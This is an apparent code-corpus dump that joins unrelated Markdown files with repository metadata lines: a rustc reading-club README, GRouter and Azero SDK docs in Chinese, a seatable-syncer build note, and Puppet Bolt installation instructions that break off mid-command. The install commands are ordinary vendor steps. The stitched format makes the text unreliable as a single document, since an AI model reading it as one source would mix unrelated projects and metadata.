ehuss/rustc-code-reading-club
43cb6a1a7a63abc42b0667cd53df1b9170fe4f2d
[ "Apache-2.0" ]
null
null
null
# What is this? Ever wanted to understand how [rustc] works? **This club is for you!** Inspired by the very cool [Code Reading Club](https://code-reading.org/), the idea is to get together every few weeks and just spend some time reading the code in [rustc] or other related projects. The way this club works is pretty simple: every other week, we'll get together for 90 minutes and read some part of rustc (or some project related to rustc), and talk about it. Our goal is to walk away with a high-level understanding of how that code works. For more complex parts of the code, we may wind up spending multiple sessions on the same code. We'll be following a "semi-structured" reading process: * Identify the modules in the code and their purpose. * Look at the type definitions and try to describe their high-level purpose. * Identify the most important functions and their purpose. * Dig into how a few of those functions are actually implemented. The meetings will *not* be recorded, but they will be open to anyone. ≥The first meeting of the Rustc Reading Club will be **November 4th, 2021 at 12:00pm US Eastern time**. Hope to see you there!
64.222222
353
0.766436
eng_Latn
0.999903
bb38754c39708b313798d6819e5b131681113de5
1,884
md
Markdown
doc/RouterComponent、RouterTask、RouterDelegate对比.md
taoweiji/grouter-android
6db9a3671e173eec56481c1a1adc1b4238933c9f
[ "Apache-2.0" ]
34
2019-09-18T10:17:46.000Z
2021-12-12T14:50:20.000Z
doc/RouterComponent、RouterTask、RouterDelegate对比.md
taoweiji/grouter-android
6db9a3671e173eec56481c1a1adc1b4238933c9f
[ "Apache-2.0" ]
1
2019-10-12T17:35:59.000Z
2019-10-24T06:23:42.000Z
doc/RouterComponent、RouterTask、RouterDelegate对比.md
taoweiji/grouter-android
6db9a3671e173eec56481c1a1adc1b4238933c9f
[ "Apache-2.0" ]
5
2019-10-15T04:00:28.000Z
2021-12-10T10:21:01.000Z
GRouter 提供三种组件间通信组件,RouterComponent、RouterTask和RouterDelegate,各个组件都有不同的特点有不同的应用场景。 | | RouterComponent | RouterTask | RouterDelegate | | ------------- | ------------------------------------------------------------ | ----------------------------------------- | ------------------------------------------------------------ | | 跨Project调用 | 支持 | 支持 | 不支持 | | 描述 | 接口下沉式组件间服务 | 非下沉式组件间单任务服务 | 代理式服务 | | 缺点 | 需要在BaseModule下沉接口,适合在当前Project中使用,跨Project成本较大 | 每个Task只能执行一种任务 | 整体使用反射实现,与实现类关联性很低,只适合在当前Project使用 | | 优点 | | 依赖性很低,特别适合在跨Project项目中使用 | | | | | | | ### RouterComponent(需要下沉接口,多工程) 通常用于频繁使用的组件,比如获取当前的登录信息,获取单个用户信息等,使用频率很高,在各个Module都有不同程度的调用,由于是接口实现方式实现,代码调用方便。 ### RouterDelegate(需要下沉Class,最简单,当前工程) RouterDelegate 的使用极其简单,原理是在BaseModule生成对应的壳类,通过反射代理的方式调用原来的类,虽然反射并没有降低太多的性能,但是使用时候需要更多的注意,因为需要代理的方法依赖的Class(eg. User.class)必须在BaseModule也存在,否则会生成代码出错,一旦出错就需要使用Gradle插件`GRouterFixRelease`命令解决错误。 ### RouterTask(多工程、混合开发,功能强大) RouterTask的使用非常广泛,无需下沉接口,支持URL调用,相当于远程服务器API一样,可以在当前的Project使用,也可以解决不同的Project的服务调用问题,而且还支持 `Hybrid H5`和`Flutter`混合开发调用服务,支持转换成String、Map、反序列化对象和List,方便调用者在无依赖情况下使用,应用范围比RouterComponent和RouterDelegate大很多。
62.8
204
0.41879
yue_Hant
0.745665
bb38d5b467afc3bdd5dfbb1d9d076f3dac51d726
5,988
md
Markdown
README.md
hnxyxiaomeng/Azero_SDK_for_Linux
157f90be753fd8f6cf932dd6c6cb07f9ca2567c3
[ "Apache-2.0" ]
1
2020-01-09T12:34:42.000Z
2020-01-09T12:34:42.000Z
README.md
hnxyxiaomeng/Azero_SDK_for_Linux
157f90be753fd8f6cf932dd6c6cb07f9ca2567c3
[ "Apache-2.0" ]
null
null
null
README.md
hnxyxiaomeng/Azero_SDK_for_Linux
157f90be753fd8f6cf932dd6c6cb07f9ca2567c3
[ "Apache-2.0" ]
null
null
null
# Azero Linux 新手运行说明 ## 目录 * [说明](#Description) * [下载](#Donwload) * [工程结构](#Contents) * [编译环境搭建](#Compiled) * [示例运行](#QuickStart) * [附录](#Appendix) * [通道顺序设置方法](#ChangeChannelMap) * [其它文档](#OtherDoc) ## 说明<a id="Description"></a> 此文档负责帮助大家在设备上运行示例,当前支持arm-linux-gnueabihf、aarch64-gnu、Ubuntu x86-64、arm-openwrt-muslgnueabi、arm-openwrt-glibc版本。按照步骤操作可保证示例demo以2mic的形式跑通。 ## 下载<a id="Download"></a> * Github下载:https://github.com/sai-azero/Azero_SDK_for_Linux/releases * 网盘下载:https://pan.baidu.com/s/1eNPBimZw6UzUNGUyucEfCQ ## 工程结构<a id="Contents"></a> * sai_config : 配置文件目录,根据版本又分为arm、x86_64-linux目录 * include : Azero SDK的.h文件 * link-libs : 编译示例代码所需的依赖库,目录中分版本放置。 * lib : Azero SDK库 * libvlc : SDK依赖的播放器库,默认支持的播放器为VLC * 其它 : 其它类型的播放器,视版本而定 * src : 示例代码 * main.cpp * toolchain-cmake : cmake交叉编译配置文件 ## 编译环境搭建<a id="Compiled"></a> 可使用任意一种软件构建工具进行编译环境的搭建。此处默认使用cmake。 #### 环境要求 * Ubuntu 16.04 LTS x64 * 设备平台对应的编译链 * cmake 及3.5以上 #### arm系版本编译方式<a id="CompilationMethod"></a> 在工程根目录执行run.sh脚本,如下所示: ![run.png](./assets/run.png) 未加参数运行,会打印出编译命令格式说明。当前已支持的版本有arm-linux-gnueabihf、aarch64-gnu、Ubuntu x86-64、arm-openwrt-muslgnueabi、arm-openwrt-glibc。 根据编译机交叉编译链的安装路径修改toolchain-cmake目录中对应版本的cmake配置文件并配置环境变量。以arm-linux-gnueabihf为例: 1. 假设编译机交叉编译链安装路径为/usr/local/share/gcc-linaro-6.3.1-2017.05-x86_64_arm-linux-gnueabihf。修改toolchain-cmake/arm-linux-gnueabihf-toolchain.cmake文件中的CROSS_COMPILING_ROOT项为上述路径(aarch64-gnu修改toolchain-cmake/aarch64-gnu-toolchain.cmake)。 2. 设置环境变量路径: ``` $export PATH=$PATH:/usr/local/share/gcc-linaro-6.3.1-2017.05-x86_64_arm-linux-gnueabihf/bin ``` 3. 设置成功后,执行arm-linux-gnueabihf-gcc -v结果如下图所示代表环境变量配置成功。 ![check.png](./assets/check.png) 4. 在工程根目录执行: ``` $./run.sh arm-linux-gnueabihf ``` 若工程根目录生成了示例程序sai_client,则代表编译成功。其它arm系列版本编译链配置方法类似。 #### Ubuntu x86-64 编译运行方法 Ubuntu x86-64编译运行方法略有不同,见[Ubuntu Linux 16.04 LTS (x86_64) 编译指引](./doc/Ubuntu/ubuntu16.04_x86_64_build_guide.md) ## 示例运行<a id="QuickStart"></a> 软件初始化时需要三个参数:clientId、productId以及device_SN(Device Serial Number)。其中,clientId、productId用以标识产品类别,device_SN用以标识个体设备。它们的获取方式如下: **设备注册**<a id="DeviceRegist"></a> clientId、productId获取方法: 1. 登录到[Azero开放平台](https://azero.soundai.com)注册账号,账号需进行实名认证。 2. 接下来创建设备,请参考[设备接入介绍](https://azero.soundai.com/docs/document)进行设备注册。 ![dev_reg.png](./assets/dev_reg.png) 3. 创建完毕后,在“**设备中心**->**已创建设备**”页面可以看到创建的设备,点击对应设备的“查看”进入设备信息页面,页面中的“产品ID”项对应的值即为productId;"Client ID"项对应的值即为clientId。 4. device_SN用来区分设备个体,保证每台唯一即可,一般可使用mac地址。 以上三个参数均在配置文件目录的config.json中进行修改。 **设置参数&运行** Note:选取的设备需确保arecord可正常录取到音频,录音所需的参数请向设备提供商咨询。 1. 根据设备arecord在示例代码main.cpp的load_plugin_basex函数中设置读取音频相关参数 ```c++ //示例默认采用2 mic运行,此参数无需修改。 int mic_num = 2; //读取音频时的通道数,对应arecord的-c项。 int board_num = 8; //此参数一般无需修改。 int frame = 16*16; //音频设备号,对应arecord的-D项。 const char *hw = "hw:0,0"; //通道顺序,设置方法见附录“通道顺序配置方法”。 char chmap[16] = "0,1,3,4,2,5,6,7"; //采样位深,对应arecord的-f项。 SaiMicBaseX_SetBit(handle,16); //采样率,对应arecord的-r项。 SaiMicBaseX_SetSampleRate(handle,16000); //mic信号位移,在采样位深大于16bit时生效,一般取采样位深与16的差值即可。 SaiMicBaseX_SetMicShiftBits(handle,16); //回采信号位移,在采样位深大于16bit时生效,一般取采样位深与16的差值即可。 SaiMicBaseX_SetRefShiftBits(handle,16); //与设备相关,对应arecord的--period-size项,一般无需修改。 SaiMicBaseX_SetPeroidSize(handle,512); //与设备相关,对应arecord的--buffer-size项,一般无需修改。 SaiMicBaseX_SetBufferSize(handle,4096); ``` 2. 在main.cpp中填写clientId、productId与device_SN字段并按照“[编译方式](#CompilationMethod)”编译。其中,clientId与productId通过“[设备注册](#DeviceRegist)”获取,device_SN字段填写此设备独有的字符串即可,一般可以使用mac地址。若clientID与productID填写不正确会使示例程序sai_client初始化时授权不通过。 ```c++ //config customer info const char *client_ID = "xxxxxxxx"; //set to your own client const char *product_ID = "xxxxxxxx"; //set your owner product ID const char *device_SN = "xxxxxxxx"; //set the unique device SN. azero_set_customer_info(client_ID,product_ID,device_SN); ``` 3. 将编译生成的sai_client、link-libs目录中对应版本的库文件推送到设备中,并按需要配置好库目录中各个库的软链接。例如,我们要在某台设备的/tmp/azerotest下运行示例程序sai_client,并假设这台设备已经默认安装了vlc播放器。 4. 将sai_config目录的文件推送到/data目录下,若data空间有限,可使用软链接的方式将配置文件链接到/data下。 5. 配置好环境变量,运行sai_client即可。 6. 示例程序唤醒词为“小易小易”,音箱给出唤醒提示后,即可说出命令词。例如,“小易小易,播放歌曲”、“小易小易,我想听相声”、“小易小易,今天天气”。 * *sai_config目录config.json文件中,键值为db后缀名的文件是运行时自动生成的文件,其生成位置可自行配置。运行前请确认路径有效。* * *当前arm系列版本支持的通道数为8,若设备数据通道数小于8需在main.cpp读数据部分自行填充。* ![CommandExample](./assets/CommandExample.png) ## 附录<a id="Appendix"></a> #### 通道顺序设置方法<a id="ChangeChannelMap"></a> 之所以需要对通道顺序进行设置是因为不同的设备通道顺序会有差别,通过对通道顺序进行调整确保通道顺序为通道号从小往大“**2路mic信号**+**回采信号**+**其它信号**”的顺序。具体调整方式如下: 1. 保证chmap参数为默认的升序“0,1,2,3,4,5,6,7, ... ”(确保数字总数与设备arecord录音时-c通道参数相同,并且从0开始), 在/tmp目录下执行如下命令,ls可看到生成了一个大小为0的名为savebasex.pcm的文件。 ``` shell $ touch savebasex.pcm ``` 2. 运行编译出的sai_client开始录制,数据会写入到savebasex.pcm中,这时可以对着mic说话或者使用手机外放一段音乐,录制10s左右取出音频文件使用音频软件查看。例如,以8ch的设备为例,录取音频的图如下,其中,通道一、二、三、五、六、七为mic数据,通道四、通道八为空数据: ![channel0](./assets/channel0.png) 3. 使设备在播放音乐的同时进行录音,查看音频文件,多出音乐信号的那一路或两路就是回采信号通路。例如,使用aplay播放一段wav音频的同时使用步骤1的方法录音,结果见下图。至此,确定通道一、二、三、五、六、七为mic信号通道,通道四为回采信号通道。 ![channel1](./assets/channel1.png) 4. 任选取mic信号通道的两路,标记为"0,1",例如,此处选择通道二、三将其标为0、1,表示将这两路数据放置到通道一和通道二。 5. 将回采通道标记到步骤三确定的mic通道之后。此处,将回采通道四标记为“2”,见下图。 ![channel2](./assets/channel2.png) 6. 其余通道继续将标记依次增大填充。此示例设备最终的通道顺序为“3,0,1,2,4,5,6,7”。 ![channel3](./assets/channel3.png) 7. 将计算好的通道顺序填写在chmap配置项中即可。 #### 其它<a id="OtherDoc"></a> * [Ubuntu Linux 16.04 LTS (x86_64) 编译指引](./doc/Ubuntu/ubuntu16.04_x86_64_build_guide.md) * [Azero树莓派运行参考](./doc/raspberryPI/raspberryPI_guide.md) ## 更多技能与进阶调优 * 更丰富的技能和个性化定制体验,请到[技能商店](https://azero.soundai.com/skill-store/all-skills)为设备配置官方或者第三方技能,也可以按照[技能接入介绍](https://azero.soundai.com/docs/document)创建自有技能,实现定制化需求。 * 若需将Azero SDK集成到您的工程,并针对您的设备进行唤醒、识别等语音交互效果的调优请参照进阶文档(暂未发布)。
34.022727
230
0.732632
yue_Hant
0.554402
bb39bbe5bfa4a9b3660a623a6051282803d0785b
192
md
Markdown
README.md
seatable/seatable-syncer
7b0956abede6ece8f493f49e12402906253bf1a9
[ "Apache-2.0" ]
null
null
null
README.md
seatable/seatable-syncer
7b0956abede6ece8f493f49e12402906253bf1a9
[ "Apache-2.0" ]
null
null
null
README.md
seatable/seatable-syncer
7b0956abede6ece8f493f49e12402906253bf1a9
[ "Apache-2.0" ]
null
null
null
# seatable-syncer ## Docker build * cd syncer/frontend * npm install --no-audit * npm run build * vim Dockerfile, SYNC_VERSION=x.x.x * docker build -t seatable/seatable-syncer-test:x.x.x ./
19.2
56
0.71875
eng_Latn
0.201645
bb3b926c6d51d08cdb361989b19465a2732291d5
1,485
md
Markdown
AlchemyInsights/restore-a-deleted-subsite.md
pebaum/OfficeDocs-AlchemyInsights-pr.es-ES
1ef7350ca1a1c8038bc57b9e47bdd510bb7c83d5
[ "CC-BY-4.0", "MIT" ]
null
null
null
AlchemyInsights/restore-a-deleted-subsite.md
pebaum/OfficeDocs-AlchemyInsights-pr.es-ES
1ef7350ca1a1c8038bc57b9e47bdd510bb7c83d5
[ "CC-BY-4.0", "MIT" ]
null
null
null
AlchemyInsights/restore-a-deleted-subsite.md
pebaum/OfficeDocs-AlchemyInsights-pr.es-ES
1ef7350ca1a1c8038bc57b9e47bdd510bb7c83d5
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Restaurar un subsitio eliminado ms.author: stevhord author: bentoncity manager: scotv ms.date: 04/21/2020 ms.audience: Admin ms.topic: article ROBOTS: NOINDEX, NOFOLLOW localization_priority: Normal ms.collection: Adm_O365 ms.custom: '' ms.assetid: 646fe22b-9980-4970-800b-034788de0c7f ms.openlocfilehash: c7da70d293730dcb5df1f13c42252bab58f41711 ms.sourcegitcommit: 631cbb5f03e5371f0995e976536d24e9d13746c3 ms.translationtype: MT ms.contentlocale: es-ES ms.lasthandoff: 04/22/2020 ms.locfileid: "43758699" --- # <a name="restore-a-deleted-sharepoint-subsite"></a>Restaurar un subsitio de SharePoint eliminado Los subsitios eliminados se envían a la papelera de reciclaje de la colección de sitios, donde se conservan durante 93 días. Para restaurar un subsitio eliminado: 1. En el nuevo centro de administración de SharePoint, busque el sitio desde el que se eliminó el subsitio y asegúrese de que es un administrador de la colección de sitios. 2. Vaya al sitio. Haga clic en **papelera de reciclaje** en el panel izquierdo. (Si no ve la papelera de reciclaje, haga clic en el icono configuración y, a continuación, haga clic en **contenido del sitio**. La papelera de reciclaje se encuentra en el extremo derecho de la barra de comandos en la parte superior.) 3. En la parte inferior de la página, haga clic en **papelera de reciclaje de la segunda etapa**. 4. Haga clic a la izquierda del subsitio y, a continuación, haga clic en **restaurar**.
43.676471
315
0.781818
spa_Latn
0.943183
bb3bdb06ea78ea1b725a2b1fe27320a6f5d45910
1,633
md
Markdown
biztalk/adapters-and-accelerators/accelerator-hl7/step-16-start-the-orchestration.md
sandroasp/biztalk-docs
9238693abb46f56cab3ca0a2f0b447db02f8101b
[ "CC-BY-4.0", "MIT" ]
null
null
null
biztalk/adapters-and-accelerators/accelerator-hl7/step-16-start-the-orchestration.md
sandroasp/biztalk-docs
9238693abb46f56cab3ca0a2f0b447db02f8101b
[ "CC-BY-4.0", "MIT" ]
null
null
null
biztalk/adapters-and-accelerators/accelerator-hl7/step-16-start-the-orchestration.md
sandroasp/biztalk-docs
9238693abb46f56cab3ca0a2f0b447db02f8101b
[ "CC-BY-4.0", "MIT" ]
1
2020-04-21T15:16:54.000Z
2020-04-21T15:16:54.000Z
--- title: "Step 16: Start the Orchestration | Microsoft Docs" ms.custom: "" ms.date: "06/08/2017" ms.prod: "biztalk-server" ms.reviewer: "" ms.suite: "" ms.tgt_pltfrm: "" ms.topic: "article" helpviewer_keywords: - "orchestrations, starting" - "message enrichment tutorial, orchestrations" ms.assetid: a9032b0b-1497-4f6a-8474-a94c14976be0 caps.latest.revision: 3 author: "MandiOhlinger" ms.author: "mandia" manager: "anneta" --- # Step 16: Start the Orchestration In this step, you enlist the service in order to associate the business process that you designed in the orchestration with the physical environment in which the orchestration will run. Additionally, you start the processing of the orchestration so that you can test your application. ### To start the orchestration 1. In the [!INCLUDE[btsBizTalkServerNoVersion](../../includes/btsbiztalkservernoversion-md.md)] Administration console, in the console tree pane, under **Orchestrations**, right-click **BTAHL7_Project.Doorbell_Orchestration**, and then click **Enlist**. 2. Right-click **BTAHL7_Project.Doorbell_Orchestration**, and then click **Start**. > [!NOTE] > Ensure that you have started the **MLLPSendPort** send port and enabled the **WebService_BTAHL7_Project_Proxy/BTAHL7_Project_Doorbell_Orchestration_SOAPReceivePort** receive location. Proceed to [Step 17: Create the WSClient Application](../../adapters-and-accelerators/accelerator-hl7/step-17-create-the-wsclient-application.md). ## See Also [Message Enrichment Tutorial](../../adapters-and-accelerators/accelerator-hl7/message-enrichment-tutorial.md)
46.657143
286
0.758726
eng_Latn
0.853058
bb3c4f42d0b7409fac747b284a4212129d15e529
57
md
Markdown
README.md
saviodo5591/express-graphql
eaacc2bb849ba0d28be0a29c87fec00fd5e81ab3
[ "MIT" ]
null
null
null
README.md
saviodo5591/express-graphql
eaacc2bb849ba0d28be0a29c87fec00fd5e81ab3
[ "MIT" ]
null
null
null
README.md
saviodo5591/express-graphql
eaacc2bb849ba0d28be0a29c87fec00fd5e81ab3
[ "MIT" ]
null
null
null
# express-graphql GraphQL being run on an express server
19
38
0.807018
eng_Latn
0.989623
bb3c9e2eac2d040141004e719531eb5cd7e1adff
3,631
md
Markdown
docs/visual-basic/language-reference/modifiers/index.md
douglasbreda/docs.pt-br
f92e63014d8313d5e283db2e213380375cea9a77
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/visual-basic/language-reference/modifiers/index.md
douglasbreda/docs.pt-br
f92e63014d8313d5e283db2e213380375cea9a77
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/visual-basic/language-reference/modifiers/index.md
douglasbreda/docs.pt-br
f92e63014d8313d5e283db2e213380375cea9a77
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Modificadores (Visual Basic) ms.date: 07/20/2015 ms.assetid: a49a0e51-d700-4705-9196-3e0eb582dda6 ms.openlocfilehash: 5e4a37a53d04174c53fdbdc30139d61ecd9998cc ms.sourcegitcommit: 3d5d33f384eeba41b2dff79d096f47ccc8d8f03d ms.translationtype: MT ms.contentlocale: pt-BR ms.lasthandoff: 05/04/2018 ms.locfileid: "33600627" --- # <a name="modifiers-visual-basic"></a>Modificadores (Visual Basic) Os tópicos nesta seção documentam modificadores de tempo de execução do Visual Basic. ## <a name="in-this-section"></a>Nesta seção [Ansi](../../../visual-basic/language-reference/modifiers/ansi.md) [Assembly](../../../visual-basic/language-reference/modifiers/assembly.md) [Async](../../../visual-basic/language-reference/modifiers/async.md) [Auto](../../../visual-basic/language-reference/modifiers/auto.md) [ByRef](../../../visual-basic/language-reference/modifiers/byref.md) [ByVal](../../../visual-basic/language-reference/modifiers/byval.md) [Padrão](../../../visual-basic/language-reference/modifiers/default.md) [Friend](../../../visual-basic/language-reference/modifiers/friend.md) [In](../../../visual-basic/language-reference/modifiers/in-generic-modifier.md) [Iterador](../../../visual-basic/language-reference/modifiers/iterator.md) [Chave](../../../visual-basic/language-reference/modifiers/key.md) [Módulo \<palavra-chave >](../../../visual-basic/language-reference/modifiers/module-keyword.md) [MustInherit](../../../visual-basic/language-reference/modifiers/mustinherit.md) [MustOverride](../../../visual-basic/language-reference/modifiers/mustoverride.md) [Narrowing](../../../visual-basic/language-reference/modifiers/narrowing.md) [NotInheritable](../../../visual-basic/language-reference/modifiers/notinheritable.md) [NotOverridable](../../../visual-basic/language-reference/modifiers/notoverridable.md) [Opcional](../../../visual-basic/language-reference/modifiers/optional.md) [Saída](../../../visual-basic/language-reference/modifiers/out-generic-modifier.md) [Sobrecargas](../../../visual-basic/language-reference/modifiers/overloads.md) [Substituível](../../../visual-basic/language-reference/modifiers/overridable.md) [Substituições](../../../visual-basic/language-reference/modifiers/overrides.md) [ParamArray](../../../visual-basic/language-reference/modifiers/paramarray.md) [Parcial](../../../visual-basic/language-reference/modifiers/partial.md) [Privado](../../../visual-basic/language-reference/modifiers/private.md) [Protegido](../../../visual-basic/language-reference/modifiers/protected.md) [Público](../../../visual-basic/language-reference/modifiers/public.md) [ReadOnly](../../../visual-basic/language-reference/modifiers/readonly.md) [Sombras](../../../visual-basic/language-reference/modifiers/shadows.md) [Compartilhado](../../../visual-basic/language-reference/modifiers/shared.md) [Estático](../../../visual-basic/language-reference/modifiers/static.md) [Unicode](../../../visual-basic/language-reference/modifiers/unicode.md) [Ampliação](../../../visual-basic/language-reference/modifiers/widening.md) [WithEvents](../../../visual-basic/language-reference/modifiers/withevents.md) [WriteOnly](../../../visual-basic/language-reference/modifiers/writeonly.md) ## <a name="related-sections"></a>Seções relacionadas [Referência da linguagem Visual Basic](../../../visual-basic/language-reference/index.md) [Visual Basic](../../../visual-basic/index.md)
40.344444
99
0.69485
yue_Hant
0.278607
bb3d7b89fcc2e3ae7db0427f3f0d5b57c41575de
231
md
Markdown
_posts/effective python之用Pythonic方式来思考.md
bjmsong/bjmsong.github.io
3b3d48165e9962a63e0b3b2fd2e7edeea8b1164a
[ "MIT" ]
5
2020-06-18T07:23:12.000Z
2021-09-09T02:52:17.000Z
_posts/effective python之用Pythonic方式来思考.md
bjmsong/bjmsong.github.io
3b3d48165e9962a63e0b3b2fd2e7edeea8b1164a
[ "MIT" ]
null
null
null
_posts/effective python之用Pythonic方式来思考.md
bjmsong/bjmsong.github.io
3b3d48165e9962a63e0b3b2fd2e7edeea8b1164a
[ "MIT" ]
1
2020-08-30T23:47:30.000Z
2020-08-30T23:47:30.000Z
--- layout: post title: effective python之用Pythonic方式来思考 subtitle: date: 2020-02-12 author: bjmsong header-img: img/python.jpg catalog: true tags: - python --- > ### 参考资料 - 《effective python》第一章
10.043478
43
0.614719
eng_Latn
0.655784
bb3dd97a67f9e1a6a08c8f684a5f8e153a9f782b
1,359
md
Markdown
PAT_B/B1018.md
wang-jinghui/PAT-A-B-
0d9037444775f37c2126c2e267f7e977180c1ac7
[ "MIT" ]
null
null
null
PAT_B/B1018.md
wang-jinghui/PAT-A-B-
0d9037444775f37c2126c2e267f7e977180c1ac7
[ "MIT" ]
null
null
null
PAT_B/B1018.md
wang-jinghui/PAT-A-B-
0d9037444775f37c2126c2e267f7e977180c1ac7
[ "MIT" ]
null
null
null
1018 锤子剪刀布 (20)(20 分) 大家应该都会玩“锤子剪刀布”的游戏:两人同时给出手势,胜负规则如图所示: 现给出两人的交锋记录,请统计双方的胜、平、负次数,并且给出双方分别出什么手势的胜算最大。 输入格式: 输入第1行给出正整数N(<=10^5^),即双方交锋的次数。随后N行,每行给出一次交锋的信息,即甲、乙双方同时给出的的手势。C代表“锤子”、J代表“剪刀”、B代表“布”,第1个字母代表甲方,第2个代表乙方,中间有1个空格。 输出格式: 输出第1、2行分别给出甲、乙的胜、平、负次数,数字间以1个空格分隔。第3行给出两个字母,分别代表甲、乙获胜次数最多的手势,中间有1个空格。如果解不唯一,则输出按字母序最小的解。 输入样例: 10 C J J B C B B B B C C C C B J B B C J J 输出样例: 5 3 2 2 3 5 B B ```C++ #include <iostream> using namespace std; int transform(char c) { if (c == 'B') return 0; if (c == 'C') return 1; if (c == 'J') return 2; } int main() { char str[4] = "BCJ",a , b; int j_win = 0 , y_win = 0, n; int j[3] = {0}, y[3] = {0}; cin >>n; for (int i = 0; i < n ; i++) { cin >> a >> b; int k1 = transform(a); int k2 = transform(b); if ((k1+1)%3 == k2) { j_win++; j[k1]++; } else if (k1 == k2) continue; else { y_win++; y[k2]++; } } int max_j = j[0] >= j[1] ? 0 : 1; max_j = j[max_j] >= j[2] ? max_j : 2; int max_y = y[0] >= y[1] ? 0 : 1; max_y = y[max_y] >= y[2] ? max_y : 2; cout <<j_win<<' '<<n-(j_win+y_win)<<' '<<y_win<<endl; cout <<y_win<<' '<<n-(j_win+y_win)<<' '<<j_win<<endl; cout <<str[max_j]<<' '<<str[max_y]<<endl; return 0; } ```
15.802326
111
0.494481
yue_Hant
0.490783
bb3e43a2639ecaf20126e73843e98e057be5a776
24
md
Markdown
src/pages/languages/QuakeC.qc.md
FractalHQ/HelloWorlds
c6f90363a5f34ae6040858502fd5714ec3184512
[ "MIT" ]
null
null
null
src/pages/languages/QuakeC.qc.md
FractalHQ/HelloWorlds
c6f90363a5f34ae6040858502fd5714ec3184512
[ "MIT" ]
null
null
null
src/pages/languages/QuakeC.qc.md
FractalHQ/HelloWorlds
c6f90363a5f34ae6040858502fd5714ec3184512
[ "MIT" ]
null
null
null
bprint("Hello World\n");
24
24
0.708333
hun_Latn
0.102949
bb3f00d707a56758d55261af7a6016ac29f4f9a8
10,949
md
Markdown
documentation/bolt_installing.md
david22swan/bolt
eb9e0148df25ff588af5ecd7ae33e5d4ef7f1d96
[ "Apache-2.0" ]
null
null
null
documentation/bolt_installing.md
david22swan/bolt
eb9e0148df25ff588af5ecd7ae33e5d4ef7f1d96
[ "Apache-2.0" ]
null
null
null
documentation/bolt_installing.md
david22swan/bolt
eb9e0148df25ff588af5ecd7ae33e5d4ef7f1d96
[ "Apache-2.0" ]
null
null
null
# Installing Bolt > Bolt automatically collects data about how you use it. If you want to opt > out of providing this data, you can do so. For more information, see > [Opt out of data collection](analytics.md#opt-out-of-data-collection). Packaged versions of Bolt are available for several Linux distributions, macOS, and Microsoft Windows. | Operating system | Versions | | ------------------------- | ------------------- | | Debian | 9, 10 | | Fedora | 30, 31, 32 | | macOS | 10.14, 10.15 | | Microsoft Windows* | 10 Enterprise | | Microsoft Windows Server* | 2012R2, 2019 | | RHEL | 6, 7, 8 | | SLES | 12 | | Ubuntu | 16.04, 18.04, 20.04 | > **Note:** Windows packages are automatically tested on the versions listed > above, but might be installable on other versions. ## Install Bolt on Debian **Install Bolt** To install Bolt, run the appropriate command for the version of Debian you have installed: - _Debian 9_ ```shell wget https://apt.puppet.com/puppet-tools-release-stretch.deb sudo dpkg -i puppet-tools-release-stretch.deb sudo apt-get update sudo apt-get install puppet-bolt ``` - _Debian 10_ ```shell wget https://apt.puppet.com/puppet-tools-release-buster.deb sudo dpkg -i puppet-tools-release-buster.deb sudo apt-get update sudo apt-get install puppet-bolt ``` **Upgrade Bolt** To upgrade Bolt to the latest version, run the following command: ```shell sudo apt-get update sudo apt install puppet-bolt ``` **Uninstall Bolt** To uninstall Bolt, run the following command: ```shell sudo apt remove puppet-bolt ``` ## Install Bolt on Fedora **Install Bolt** To install Bolt, run the appropriate command for the version of Fedora you have installed: - _Fedora 30_ ```shell sudo rpm -Uvh https://yum.puppet.com/puppet-tools-release-fedora-30.noarch.rpm sudo dnf install puppet-bolt ``` - _Fedora 31_ ```shell sudo rpm -Uvh https://yum.puppet.com/puppet-tools-release-fedora-31.noarch.rpm sudo dnf install puppet-bolt ``` - _Fedora 32_ ```shell sudo rpm -Uvh https://yum.puppet.com/puppet-tools-release-fedora-32.noarch.rpm sudo dnf install puppet-bolt ``` **Upgrade Bolt** To upgrade Bolt to the latest version, run the following command: ```shell sudo dnf upgrade puppet-bolt ``` **Uninstall Bolt** To uninstall Bolt, run the following command: ```shell sudo dnf remove puppet-bolt ``` ## Install Bolt on macOS You can install Bolt packages for macOS using either Homebrew or the macOS installer. ### Homebrew **Install Bolt** To install Bolt with Homebrew, you must have the [Homebrew package manager](https://brew.sh/) installed. 1. Tap the Puppet formula repository: ```shell brew tap puppetlabs/puppet ``` 1. Install Bolt: ```shell brew install --cask puppet-bolt ``` **Upgrade Bolt** To upgrade Bolt to the latest version, run the following command: ```shell brew upgrade --cask puppet-bolt ``` **Uninstall Bolt** To uninstall Bolt, run the following command: ```shell brew uninstall --cask puppet-bolt ``` ### macOS installer (DMG) **Install Bolt** Use the Apple Disk Image (DMG) to install Bolt on macOS: 1. Download the Bolt installer package for your macOS version. - [10.14 (Mojave)](https://downloads.puppet.com/mac/puppet-tools/10.14/x86_64/puppet-bolt-latest.dmg) - [10.15 (Catalina)](https://downloads.puppet.com/mac/puppet-tools/10.15/x86_64/puppet-bolt-latest.dmg) 1. Double-click the `puppet-bolt-latest.dmg` file to mount the installer and then double-click `puppet-bolt-[version]-installer.pkg` to run the installer. If you get a message that the installer "can't be opened because Apple cannot check it for malicious software:" 1. Click **** > **System Preferences** > **Security & Privacy**. 1. From the **General** tab, click the lock icon to allow changes to your security settings and enter your macOS password. 1. Look for a message that says the Bolt installer "was blocked from use because it is not from an identified developer" and click "Open Anyway". 1. Click the lock icon again to lock your security settings. **Upgrade Bolt** To upgrade Bolt to the latest version, download the DMG again and repeat the installation steps. **Uninstall Bolt** To uninstall Bolt, remove Bolt's files and executable: ```shell sudo rm -rf /opt/puppetlabs/bolt /opt/puppetlabs/bin/bolt ``` ## Install Bolt on Microsoft Windows Use one of the supported Windows installation methods to install Bolt. ### Chocolatey **Install Bolt** To install Bolt with Chocolatey, you must have the [Chocolatey package manager](https://chocolatey.org/docs/installation) installed. 1. Download and install the bolt package: ```powershell choco install puppet-bolt ``` 1. Refresh the environment: ```powershell refreshenv ``` 1. Install the [PuppetBolt PowerShell module](#puppetbolt-powershell-module). 1. Run a [Bolt cmdlet](bolt_cmdlet_reference.md). If you see an error message instead of the expected output, you might need to [add the Bolt module to PowerShell](troubleshooting.md#powershell-does-not-recognize-bolt-cmdlets) or [change execution policy restrictions](troubleshooting.md#powershell-could-not-load-the-bolt-powershell-module). **Upgrade Bolt** To upgrade Bolt to the latest version, run the following command: ```powershell choco upgrade puppet-bolt ``` **Uninstall Bolt** To uninstall Bolt, run the following command: ```powershell choco uninstall 